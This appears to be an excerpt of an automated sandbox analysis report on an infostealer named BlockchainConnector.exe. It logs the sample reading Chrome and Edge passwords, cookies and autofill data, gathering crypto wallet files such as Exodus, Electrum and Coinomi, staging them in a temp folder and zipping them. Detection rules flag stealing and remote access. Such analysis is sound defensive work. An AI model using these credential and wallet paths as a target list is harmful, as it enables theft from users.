Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_cookies.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Edge_Default_AFILLS.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\BPMLNOBVSB.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\KATAXZVCPS.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\NIKHQAIQAU.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\UMMBDNEQBN.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\WKXEWIOTXI.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Files VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Telegram VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00238470 GetLocalTime, 3_2_00238470
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002116C0 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent, 3_2_002116C0
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 Blob Jump to behavior

Stealing of Sensitive Information

Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Source: BlockchainConnector.exe, 00000007.00000002.1903954545.0000019A0BD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe File opened: C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb Jump to behavior
Source: Yara match File source: 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BlockchainConnector.exe PID: 7736, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BlockchainConnector.exe PID: 7736, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, type: DROPPED